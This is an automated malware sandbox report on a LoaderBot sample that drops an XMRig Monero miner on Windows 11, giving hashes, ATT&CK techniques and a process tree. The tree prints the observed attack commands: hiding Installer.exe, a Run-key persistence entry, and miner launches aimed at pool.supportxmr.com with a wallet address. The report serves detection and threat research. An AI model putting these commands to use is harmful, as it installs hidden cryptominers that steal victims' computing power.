loaderbot | 419f4b2b780057cb6244ed20ccf34817473c21becf8e21d2f3ade6d8c63d298b

Analysis

max time kernel
150s
max time network
153s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
10/08/2024, 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

419f4b2b780057cb6244ed20ccf34817473c21becf8e21d2f3ade6d8c63d298b.exe
Size

4.2MB
MD5

3c02e253cd5d0bc84a853ffdf58a5c34
SHA1

4d084c1090bab0b90da2c49dcacdd7731aaf69b2
SHA256

419f4b2b780057cb6244ed20ccf34817473c21becf8e21d2f3ade6d8c63d298b
SHA512

f2572eef44aeba80938f8634145e674883bd78e56a16ab68c95120a8627c290849e853247b2be4dd46ae02864b6137f529ad940530fb32ae27c2dcabc981827b
SSDEEP

98304:YO54BDQcY+IuJ9ESlMidCVhvFutGhvIs6q32hTk7NzwLLZ/:YONcYmEpMGBX2ho7JwR/

Score

10^/10

loaderbot xmrig discovery loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral2/files/0x000100000002aa83-82.dat	loaderbot
behavioral2/memory/4764-85-0x0000000000F60000-0x000000000135E000-memory.dmp	loaderbot

XMRig Miner payload 21 IoCs

miner

resource	yara_rule
behavioral2/memory/1672-101-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1672-103-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2968-107-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1976-111-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3972-114-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4724-118-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1040-121-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1040-122-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1044-126-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3872-130-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1212-133-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-136-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-137-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-138-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-139-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-140-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-141-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-142-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-143-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-144-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2420-145-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	Installer.exe

Executes dropped EXE 22 IoCs

pid	Process
3732	7z.exe
1952	7z.exe
4116	7z.exe
2296	7z.exe
4680	7z.exe
4048	7z.exe
4148	7z.exe
3000	7z.exe
4844	7z.exe
3384	7z.exe
4412	7z.exe
4764	Installer.exe
1672	Driver.exe
2968	Driver.exe
1976	Driver.exe
3972	Driver.exe
4724	Driver.exe
1040	Driver.exe
1044	Driver.exe
3872	Driver.exe
1212	Driver.exe
2420	Driver.exe

Loads dropped DLL 11 IoCs

pid	Process
3732	7z.exe
1952	7z.exe
4116	7z.exe
2296	7z.exe
4680	7z.exe
4048	7z.exe
4148	7z.exe
3000	7z.exe
4844	7z.exe
3384	7z.exe
4412	7z.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Installer.exe"	Installer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	419f4b2b780057cb6244ed20ccf34817473c21becf8e21d2f3ade6d8c63d298b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe
4764	Installer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3732	7z.exe
Token: 35	3732	7z.exe
Token: SeSecurityPrivilege	3732	7z.exe
Token: SeSecurityPrivilege	3732	7z.exe
Token: SeRestorePrivilege	1952	7z.exe
Token: 35	1952	7z.exe
Token: SeSecurityPrivilege	1952	7z.exe
Token: SeSecurityPrivilege	1952	7z.exe
Token: SeRestorePrivilege	4116	7z.exe
Token: 35	4116	7z.exe
Token: SeSecurityPrivilege	4116	7z.exe
Token: SeSecurityPrivilege	4116	7z.exe
Token: SeRestorePrivilege	2296	7z.exe
Token: 35	2296	7z.exe
Token: SeSecurityPrivilege	2296	7z.exe
Token: SeSecurityPrivilege	2296	7z.exe
Token: SeRestorePrivilege	4680	7z.exe
Token: 35	4680	7z.exe
Token: SeSecurityPrivilege	4680	7z.exe
Token: SeSecurityPrivilege	4680	7z.exe
Token: SeRestorePrivilege	4048	7z.exe
Token: 35	4048	7z.exe
Token: SeSecurityPrivilege	4048	7z.exe
Token: SeSecurityPrivilege	4048	7z.exe
Token: SeRestorePrivilege	4148	7z.exe
Token: 35	4148	7z.exe
Token: SeSecurityPrivilege	4148	7z.exe
Token: SeSecurityPrivilege	4148	7z.exe
Token: SeRestorePrivilege	3000	7z.exe
Token: 35	3000	7z.exe
Token: SeSecurityPrivilege	3000	7z.exe
Token: SeSecurityPrivilege	3000	7z.exe
Token: SeRestorePrivilege	4844	7z.exe
Token: 35	4844	7z.exe
Token: SeSecurityPrivilege	4844	7z.exe
Token: SeSecurityPrivilege	4844	7z.exe
Token: SeRestorePrivilege	3384	7z.exe
Token: 35	3384	7z.exe
Token: SeSecurityPrivilege	3384	7z.exe
Token: SeSecurityPrivilege	3384	7z.exe
Token: SeRestorePrivilege	4412	7z.exe
Token: 35	4412	7z.exe
Token: SeSecurityPrivilege	4412	7z.exe
Token: SeSecurityPrivilege	4412	7z.exe
Token: SeDebugPrivilege	4764	Installer.exe
Token: SeLockMemoryPrivilege	1672	Driver.exe
Token: SeLockMemoryPrivilege	1672	Driver.exe
Token: SeLockMemoryPrivilege	2968	Driver.exe
Token: SeLockMemoryPrivilege	2968	Driver.exe
Token: SeLockMemoryPrivilege	1976	Driver.exe
Token: SeLockMemoryPrivilege	1976	Driver.exe
Token: SeLockMemoryPrivilege	3972	Driver.exe
Token: SeLockMemoryPrivilege	3972	Driver.exe
Token: SeLockMemoryPrivilege	4724	Driver.exe
Token: SeLockMemoryPrivilege	4724	Driver.exe
Token: SeLockMemoryPrivilege	1040	Driver.exe
Token: SeLockMemoryPrivilege	1040	Driver.exe
Token: SeLockMemoryPrivilege	1044	Driver.exe
Token: SeLockMemoryPrivilege	1044	Driver.exe
Token: SeLockMemoryPrivilege	3872	Driver.exe
Token: SeLockMemoryPrivilege	3872	Driver.exe
Token: SeLockMemoryPrivilege	1212	Driver.exe
Token: SeLockMemoryPrivilege	1212	Driver.exe
Token: SeLockMemoryPrivilege	2420	Driver.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 2972	2144	419f4b2b780057cb6244ed20ccf34817473c21becf8e21d2f3ade6d8c63d298b.exe	78
PID 2144 wrote to memory of 2972	2144	419f4b2b780057cb6244ed20ccf34817473c21becf8e21d2f3ade6d8c63d298b.exe	78
PID 2972 wrote to memory of 3868	2972	cmd.exe	80
PID 2972 wrote to memory of 3868	2972	cmd.exe	80
PID 2972 wrote to memory of 3732	2972	cmd.exe	81
PID 2972 wrote to memory of 3732	2972	cmd.exe	81
PID 2972 wrote to memory of 1952	2972	cmd.exe	82
PID 2972 wrote to memory of 1952	2972	cmd.exe	82
PID 2972 wrote to memory of 4116	2972	cmd.exe	83
PID 2972 wrote to memory of 4116	2972	cmd.exe	83
PID 2972 wrote to memory of 2296	2972	cmd.exe	84
PID 2972 wrote to memory of 2296	2972	cmd.exe	84
PID 2972 wrote to memory of 4680	2972	cmd.exe	85
PID 2972 wrote to memory of 4680	2972	cmd.exe	85
PID 2972 wrote to memory of 4048	2972	cmd.exe	86
PID 2972 wrote to memory of 4048	2972	cmd.exe	86
PID 2972 wrote to memory of 4148	2972	cmd.exe	87
PID 2972 wrote to memory of 4148	2972	cmd.exe	87
PID 2972 wrote to memory of 3000	2972	cmd.exe	88
PID 2972 wrote to memory of 3000	2972	cmd.exe	88
PID 2972 wrote to memory of 4844	2972	cmd.exe	89
PID 2972 wrote to memory of 4844	2972	cmd.exe	89
PID 2972 wrote to memory of 3384	2972	cmd.exe	90
PID 2972 wrote to memory of 3384	2972	cmd.exe	90
PID 2972 wrote to memory of 4412	2972	cmd.exe	91
PID 2972 wrote to memory of 4412	2972	cmd.exe	91
PID 2972 wrote to memory of 1924	2972	cmd.exe	92
PID 2972 wrote to memory of 1924	2972	cmd.exe	92
PID 2972 wrote to memory of 4764	2972	cmd.exe	93
PID 2972 wrote to memory of 4764	2972	cmd.exe	93
PID 2972 wrote to memory of 4764	2972	cmd.exe	93
PID 4764 wrote to memory of 1672	4764	Installer.exe	94
PID 4764 wrote to memory of 1672	4764	Installer.exe	94
PID 4764 wrote to memory of 2968	4764	Installer.exe	97
PID 4764 wrote to memory of 2968	4764	Installer.exe	97
PID 4764 wrote to memory of 1976	4764	Installer.exe	99
PID 4764 wrote to memory of 1976	4764	Installer.exe	99
PID 4764 wrote to memory of 3972	4764	Installer.exe	101
PID 4764 wrote to memory of 3972	4764	Installer.exe	101
PID 4764 wrote to memory of 4724	4764	Installer.exe	103
PID 4764 wrote to memory of 4724	4764	Installer.exe	103
PID 4764 wrote to memory of 1040	4764	Installer.exe	105
PID 4764 wrote to memory of 1040	4764	Installer.exe	105
PID 4764 wrote to memory of 1044	4764	Installer.exe	107
PID 4764 wrote to memory of 1044	4764	Installer.exe	107
PID 4764 wrote to memory of 3872	4764	Installer.exe	109
PID 4764 wrote to memory of 3872	4764	Installer.exe	109
PID 4764 wrote to memory of 1212	4764	Installer.exe	111
PID 4764 wrote to memory of 1212	4764	Installer.exe	111
PID 4764 wrote to memory of 2420	4764	Installer.exe	113
PID 4764 wrote to memory of 2420	4764	Installer.exe	113

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1924	attrib.exe

C:\Users\Admin\AppData\Local\Temp\419f4b2b780057cb6244ed20ccf34817473c21becf8e21d2f3ade6d8c63d298b.exe
"C:\Users\Admin\AppData\Local\Temp\419f4b2b780057cb6244ed20ccf34817473c21becf8e21d2f3ade6d8c63d298b.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\system32\mode.com
    mode 65,10
    3⤵
    PID:3868
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e file.zip -p45081553117849290061075124205 -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:3732
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_10.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_9.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4116
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_8.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_7.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4680
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_6.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_5.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4148
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_4.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:3000
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_3.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4844
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_2.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:3384
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_1.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4412
- - C:\Windows\system32\attrib.exe
    attrib +H "Installer.exe"
    3⤵
    - Views/modifies file attributes
    PID:1924
- - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
    "Installer.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4764
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1672
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2968
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1976
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3972
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4724
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1040
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1044
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3872
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1212
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41wJSADBgtMYhLGiEm4cGn7Nto2pWgVbMS14myvSGXFRBhSxmZ2MauKLWBU1enJXVkiNHuZBEZuhaRnWoqEfh7r74f72bYr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

Filesize
2.2MB

MD5
9363d761301d80d565ffbce3cc921ba7

SHA1
9573a2ae1f86eff5a47a081d8bacfd5f0bdd433a

SHA256
cc4df854bd1e7defb4bae3d41df8e9f00da706803441e45bf0a3989d0230c3fc

SHA512
32a208d1101214894cac47e48972b3a2c6c6fc5e5a02e0a4184ec44edf22cd9e5a828e4a91bf2f38e56097982b4076d3f0ec3e26f415199ebde59a3f068f3e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

Filesize
4.0MB

MD5
8fccb79bcb06003b60601a384a350791

SHA1
f119fd4eb8e10640493c55e90b3213705affca30

SHA256
2c97296ca64dbd00ae6b4eafd79a941a490ef55ccf7f37f6f56758d851a5deaa

SHA512
6cd32193d086e5b4a122581472103b03b2f446803874c53b2d1a0d7af7d768805de1bf65a8e526c963064fb1bdab1508cfc4d0607dc276375c6d760fb1448a4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

Filesize
1.7MB

MD5
4754d233b18e373b5a84bb52d00858c4

SHA1
adbe686706364fab4ddf08f30d0c5f3451a97310

SHA256
dbf520a71d00bac68a8b66bec1ce7a7f8739ad62138d1628c802a937b2310f9d

SHA512
bb0e5469685932b9025f8eb05187f68d7bf450cc75fb6b9b5b655daaf132086489c6f4c6002c6cc6ea411a51f700b514a8cb7d96c6a90d6a8768781f58e58c17

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_10.zip

Filesize
3.3MB

MD5
0f888fcdee20318bfafa87d4ed9614e7

SHA1
fb136df5fc80b42f815a52b4d38df96e2c979577

SHA256
64e59dc1a6554f825a808eacf56c9974ee386a1b4eeba67459a9e3c3940c1499

SHA512
00ce05809f1504a70f45170f63e0fcd495518b2971474f82e7c5637bffd6efa19eac6f486c2cf320ea572165d64ab2c280ea617b0744e6a209e1053ce9995add

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

Filesize
1.7MB

MD5
d93a6500c7adcce87940fa7b7e08ef4c

SHA1
d8436d8101ba1e88830cf93be1e294375a0c3b40

SHA256
7bb441c57e7e02964a2c6ae4a7794a0f70e3f8886fc4651e40c86d41e3035d64

SHA512
c4b50f250bf86eadb6a409633df351b8acdc7306e5a0ec0f97df9e126f4e0b771bd635edfe48bf0367a1f442468325cb8e78bde57b1bf0fb18f998e52fe6ecb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

Filesize
1.7MB

MD5
b95b63135cbc23df2202d7b0ae9dcf73

SHA1
c30c4dd25cd9b7c67216bf20373fa36f4780d0ef

SHA256
d36336338ca84d550d6ef645afe0f7df6d06b370fc311bd45bf67e257477c6c3

SHA512
fb722790099161fa2352b6adfe56dadd881db95054879a06d85e8ccc2e7a16a493a744a860527a4f8f5007c1af10d6e4e3a24243acf810fe5332ad827c9a00f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

Filesize
1.7MB

MD5
6b92793f70c4fec7bbaa87a7e27d1975

SHA1
661ed2dea701e3ebbebad4c431ffe0014b7656e4

SHA256
6b84546095e746191c5b6a96162660499db33793cc5c84b0684f2e18f25701ae

SHA512
09b32982c4e58f64563285dfe3cca69f59b0333a6c42d4f458f1e3f242901e18537492f2803bccdbc4aa1b91d25add1a32a59f23ec32bc932812142c16d37e1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

Filesize
1.7MB

MD5
a5803fb3d2ceee689857494e3344f147

SHA1
b56242544915edbcca7fa7218e66b41a08ed780b

SHA256
e6e902368e8ac779f872d7ec6a4e6482440628d1934101d8af13d6d8ea6c2af5

SHA512
dc22c3b3614df1d38ebaba82b5da2bb227d05ba058d44be36fd955a06d827b25eefb9054566808059304439d7062e0a89865d113f5784009a62aef5a97142edb

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

Filesize
1.7MB

MD5
e1ca00199af73eb7c92a6d285a38df94

SHA1
a07d906e2418f495ef16b4b5fe094069736b62a7

SHA256
3dbf34f3fb41fef41dbcfb3a76a3725fc3f3d3b55e01c3c9026a8032ae7a8a6d

SHA512
701135487028a4ba239ecdd7ab1fc8fbd8a62157da252ae9e009fa0650e2841ce663360fd833dc0cb09537938faa43bf718d7a361d5cee489da4b9c71800ee6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

Filesize
1.7MB

MD5
c54768f8f4d8b521244a12db1aa816a3

SHA1
8b569ecdad19db61a661dd166f8f328f0e49a6c5

SHA256
b8fd5dc4698c6a15fec672755f285f19116a22c0888f722339a1ceb38c91567d

SHA512
75a06670a70d319d70df1126d53c1dcf84eb34ac6ca59af680c4c843ba22fe79bdcfc2849beca984a67b0a9b67a8dfb71ca2f1abf1a5b1293bc6d4b5cf157e9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

Filesize
1.7MB

MD5
ecd26534a3b2d00a2805dbc251f55c1d

SHA1
aedf5572f7e6b4d6f7cd8e98b058e5df9785c19f

SHA256
ebada5524ac3da53327668ae4921306c58d41db2d17a889ea428b3f3cca2cf88

SHA512
2a33099680baa717019bc8eed89949c9e087a1cf3f1b50056d256650fab3363aaf7efe6e8715059d2399025c8101f22b41e3e1f288c44827dae9d9aa21c9a300

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip

Filesize
1.7MB

MD5
4c3edc337b556855c8b64bd4435d2810

SHA1
a5ef8a3566c026c346f910c07b6a8fc3f5115b9b

SHA256
4a2a7792c1727d07fb72a41054c3f74e9a743e2a6f5776292cac0aacff60b107

SHA512
49b96b86f834edaa0423ccfdca31e42f3c7cb15aef84cde9844512d84c6a294e3f9519fb5a1192f1716b8c236a75315e7af4ecdbcca299c39ac0c5c49fef7f57

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
3.3MB

MD5
20fdcfaf0306917d21ba3b7e26154b3b

SHA1
ec0e89fce7494826adc971232d6d68d1923dad6a

SHA256
677974fd3c8f865800896b4742d4135e6968a0500fbd13aa70c5cab86c42ca03

SHA512
a02bc71b4fb7152c5cdc19fa928a6d817eaa7dee29bb3bef0f791c04170fd2fb1486bc5325810d9fd23f78259b3fa3a89d32184bf6f6b18c1afd0065def3cd00

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
476B

MD5
4c5f950ef7656023b3f17d1b0eab088e

SHA1
25ef9c5fe93cd48a94af1d91b418914b46dcbb81

SHA256
bd386aaa62ff3fea8b8fdc39309a931c506f1dc6dd7cb1ece5d7e716e7b2add7

SHA512
e5c3646abc0e4c16738a340cde978608210c8ecae4682570f1d72a829b2e74a36e72181838bd71025fd587c591e0cb9d8e7d5f4d6ff508ccd1ac843b2371a9cd

Download Submit
